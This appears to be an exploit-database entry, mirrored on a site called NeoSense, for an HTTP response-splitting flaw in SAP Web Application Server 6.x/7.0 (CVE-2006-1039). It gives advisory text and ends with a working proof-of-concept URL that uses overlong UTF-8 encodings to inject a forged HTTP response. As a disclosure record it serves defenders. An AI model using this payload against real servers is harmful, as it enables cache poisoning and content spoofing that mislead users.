[] NeoSense
E X P L O I T S
title author type platform port cve id

SAP Web Application Server 6.x/7.0 - Input Validation

Author: Arnold Grossmann
type: remote
platform: multiple
port: 
date_added: 2005-11-09 
date_updated: 2013-08-27 
verified: 1 
codes: CVE-2006-1039;OSVDB-23628 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/18006/info

SAP Web Application Server is prone to an input-validation vulnerability that results in HTTP response-splitting attacks. This issue is due to a failure in the application to properly sanitize user-supplied input.

A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust.

http://sap-was/x.htm;%20HTTP%c0%af1.0%20200%20OK%c0%8d%c0%8aContent-Length:%2035%c0%8d%c0%8aContent-Type:text%c0%afhtml%c0%8d%c0%8a%c0%8d%c0%8a%3Chtml%3e%3cbody%3ehello%3c%c0%afbody%3e%3c%c0%afhtml%3e%c0%8d%c0%8a%c0%8d%c0%8a
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.